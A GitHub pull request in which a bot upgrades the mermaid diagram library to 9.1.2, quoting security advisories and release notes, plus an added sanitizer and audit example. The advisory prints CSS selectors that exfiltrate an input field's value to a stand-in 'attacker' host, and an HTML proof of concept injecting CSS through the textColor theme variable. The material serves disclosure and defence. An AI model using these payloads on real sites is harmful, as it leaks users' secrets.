
fix(deps): update dependency mermaid to v9 [security] #3661

Merged: 1 commit, Sep 27, 2022

Conversation

renovate[bot]
Contributor

@renovate renovate bot commented Sep 27, 2022

Mend Renovate

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
| --- | --- | --- | --- | --- | --- |
| mermaid | 8.11.5 -> 9.1.2 | age | adoption | passing | confidence |

GitHub Vulnerability Alerts

CVE-2021-43861

Impact

Malicious diagrams can contain JavaScript code that can be run on diagram readers' machines.

Patches

Users should upgrade to version 8.13.8.

Workarounds

You need to upgrade in order to avoid this issue.

CVE-2022-31108

An attacker is able to inject arbitrary CSS into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted CSS selectors.

The following example shows how an attacker can exfiltrate the contents of an input field by brute-forcing the value attribute one character at a time. Whenever there is an actual match, an HTTP request will be made by the browser in order to "load" a background image that will let the attacker know what the value of the character is.

input[name=secret][value^=g] { background-image: url(http://attacker/?char=g); }
...
input[name=secret][value^=go] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goo] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goos] { background-image: url(http://attacker/?char=s); }
...
input[name=secret][value^=goose] { background-image: url(http://attacker/?char=e); }

Patches

Has the problem been patched? What versions should users upgrade to?

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

References

Are there any links users can visit to find out more?

For more information

If you have any questions or comments about this advisory:

Product

mermaid.js

Tested Version

v9.1.1

Details

Issue 1: Multiple CSS Injection (GHSL-2022-036)

By supplying a carefully crafted textColor theme variable, an attacker can inject arbitrary CSS rules into the document. In the following snippet we can see that getStyles does not sanitize any of the theme variables leaving the door open for CSS injection.

Snippet from src/styles.js:

const getStyles = (type, userStyles, options) => {
  // theme variables are interpolated verbatim: no escaping or validation
  return ` {
    font-family: ${options.fontFamily};
    font-size: ${options.fontSize};
    fill: ${options.textColor}
  }`;
};

For example, if we set textColor to "green;} #target { background-color: crimson }" the resulting CSS will contain a new selector #target that will apply a crimson background color to an arbitrary element.

<html>

<body>
    <div id="target">
        <h1>This element does not belong to the SVG but we can style it</h1>
    </div>
    <svg id="diagram">
    </svg>

    <script src="https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js"></script>
    <script>
        mermaid.initialize({ startOnLoad: false });

        const graph =
            `
            %%{ init: { "themeVariables" : { "textColor": "green;} #target { background-color: crimson }" } } }%%
            graph TD
                A[Goose]
            `

        const diagram = document.getElementById("diagram")
        const svg = mermaid.render('diagram-svg', graph)
        diagram.innerHTML = svg
    </script>
</body>

</html>

In the proof of concept above we used the textColor variable to inject CSS, but there are multiple functions that can potentially be abused to change the style of the document. Some of them are in the following list, but we encourage maintainers to look for additional injection points:

Impact

This issue may lead to Information Disclosure via CSS selectors and functions able to generate HTTP requests. This also allows an attacker to change the document in ways which may lead a user to perform unintended actions, such as clicking on a link, etc.

Remediation

Ensure that user input is adequately escaped before embedding it in CSS blocks.


Release Notes

knsv/mermaid

v9.1.2

Compare Source

Release Notes

🚀 Features

Bug Fixes & Cleanup

Documentation

Dependency updates

🎉 Thanks to all contributors helping with this release! 🎉

v9.1.1

Compare Source

Release Notes

🎉 Thanks to all contributors helping with this release! 🎉

v9.1.0

Compare Source

Release Notes

🚀 Features

Documentation

Dependency updates

🎉 Thanks to all contributors helping with this release! 🎉

v9.0.1

Compare Source

Release Notes

🐛 Bug Fixes

  • Removal of vulnerability (#2958) @knsv
  • Fix broken re-rendering of gitGraph in Mermaid Live Editor

🎉 Thanks to all contributors helping with this release! 🎉

v9.0.0

Compare Source

Release Notes

Main feature

Moving the gitGraph from experimental alpha status to a fully supported diagram type which handles theming and directives. The grammar has changed slightly from the alpha version: it no longer supports reset operations, and some internal fast-forwarding has been removed for simplicity. A few GitGraphs based on the alpha version might break with the update. This is the reason for the major version number update.

We now support:

  • Commit types
  • Multiple branches in separate lanes
  • Theming

Other changes:

Documentation updates

Dependency updates

🎉 Thanks to all contributors helping with this release! 🎉

v8.14.0

Compare Source

Release Notes

Main feature

  • Adding a new, more secure security level 'sandbox' where all rendering happens in a sandboxed iframe. The returned element in this mode is also an iframe with the svg as a base64 encoded url. (#2654)

Documentation updates

Dependency updates

🎉 Thanks to all contributors helping with this release! 🎉

v8.13.10

Compare Source

Release Notes

🎉 Thanks to all contributors helping with this release! 🎉

v8.13.9

Compare Source

Release Notes

Changes to the functionality

Documentation changes

Dependency updates

🎉 Thanks to all contributors helping with this release! 🎉

v8.13.8

Compare Source

Release Notes

🎉 Thanks to all contributors helping with this release! 🎉

v8.13.7

Compare Source

Release Notes

  • Fix for vulnerability with links from actors in sequence diagrams
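As an added, defender-side example that is not part of this PR, of the advisory, or of mermaid's own code: the unescaped interpolation shape quoted from src/styles.js in GHSL-2022-036 is placed next to a hypothetical allowlist-based sanitizer, plus a small audit helper for the `%%{ init: ... }%%` directive that a server hosting user-supplied diagrams could run before rendering. All function names, the allowlist grammar, the fallback values and the assumption that the directive body is valid JSON are mine, not mermaid's; the only thing taken from the page is the textColor payload.

```javascript
// Added example (not mermaid's code): vulnerable interpolation beside a
// hardened variant, and an audit helper for the init directive.

// Vulnerable shape: theme variables are interpolated into CSS verbatim, so a
// value containing '}' closes the rule and everything after it is new CSS.
function getStylesUnsafe(options) {
  return ` {
    font-family: ${options.fontFamily};
    font-size: ${options.fontSize};
    fill: ${options.textColor}
  }`;
}

// Characters a single colour, length or font-family value legitimately needs.
// ';', '{', '}', '/', ':', '<', '>' and backslash are excluded, so a value can
// neither terminate the declaration, nor open a new block, nor carry a URL.
// (Allowlist chosen for this example; assumption, not a CSS grammar.)
const SAFE_CHARS = /^[A-Za-z0-9 #,.%()'"-]{1,64}$/;
// CSS functions permitted inside a value; url(), attr(), var() etc. are not.
const ALLOWED_FUNCTIONS = new Set(['rgb', 'rgba', 'hsl', 'hsla']);

// Returns the trimmed value if it passes the allowlist, otherwise the fallback.
function sanitizeCssValue(value, fallback) {
  if (typeof value !== 'string') return fallback;
  const v = value.trim();
  if (!SAFE_CHARS.test(v)) return fallback;
  const fns = v.match(/[A-Za-z-]+(?=\()/g) || [];
  if (!fns.every((f) => ALLOWED_FUNCTIONS.has(f.toLowerCase()))) return fallback;
  return v;
}

// Hardened shape: every interpolated value goes through the allowlist first.
// Fallback values are hypothetical defaults for this example.
function getStylesSafe(options) {
  return ` {
    font-family: ${sanitizeCssValue(options.fontFamily, 'sans-serif')};
    font-size: ${sanitizeCssValue(options.fontSize, '16px')};
    fill: ${sanitizeCssValue(options.textColor, '#333333')}
  }`;
}

// Number of '{' in the emitted CSS: a single declaration block has exactly one.
function countBlocks(css) {
  return (css.match(/\{/g) || []).length;
}

// Audit helper for diagram text stored server-side (e.g. a wiki): extracts
// themeVariables from the init directive and reports every value the
// sanitizer would refuse. Assumes the directive body is JSON. Returns [] when
// there is no directive or nothing looks injected.
function auditThemeVariables(diagramText) {
  const m = diagramText.match(/%%\{\s*init\s*:\s*(\{[\s\S]*?\})\s*\}%%/);
  if (!m) return [];
  let init;
  try {
    init = JSON.parse(m[1]);
  } catch (e) {
    return [{ name: '<directive>', value: m[1], reason: 'unparseable init directive' }];
  }
  const vars = (init && init.themeVariables) || {};
  return Object.entries(vars)
    .filter(([, value]) => sanitizeCssValue(value, null) === null)
    .map(([name, value]) => ({ name, value, reason: 'fails CSS value allowlist' }));
}

// Constructed sample input: the textColor payload from the advisory's PoC.
const INJECTED = 'green;} #target { background-color: crimson }';
const POC_DIAGRAM = `
%%{ init: { "themeVariables" : { "textColor": "${INJECTED}" } } }%%
graph TD
    A[Goose]
`;

const demoOptions = { fontFamily: 'trebuchet ms', fontSize: '16px', textColor: INJECTED };
console.log('blocks emitted (unsafe):', countBlocks(getStylesUnsafe(demoOptions)));
console.log('blocks emitted (safe):  ', countBlocks(getStylesSafe(demoOptions)));
console.log('audit findings:', auditThemeVariables(POC_DIAGRAM));
```

The unsafe path emits two rule blocks for the payload (the injected `#target` selector is the second), while the hardened path emits one and falls back to a default colour. The audit helper is the check to run where diagrams are accepted from untrusted users and the renderer cannot be upgraded immediately; a value that fails the allowlist is a reason to reject the diagram, not to try to repair it.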

@renovate renovate bot added the dependencies Pull requests that update a dependency file label Sep 27, 2022
gitpod-io bot commented Sep 27, 2022

@manekenpix manekenpix merged commit efff34f into master Sep 27, 2022
@manekenpix manekenpix deleted the renovate/npm-mermaid-vulnerability branch September 27, 2022 23:28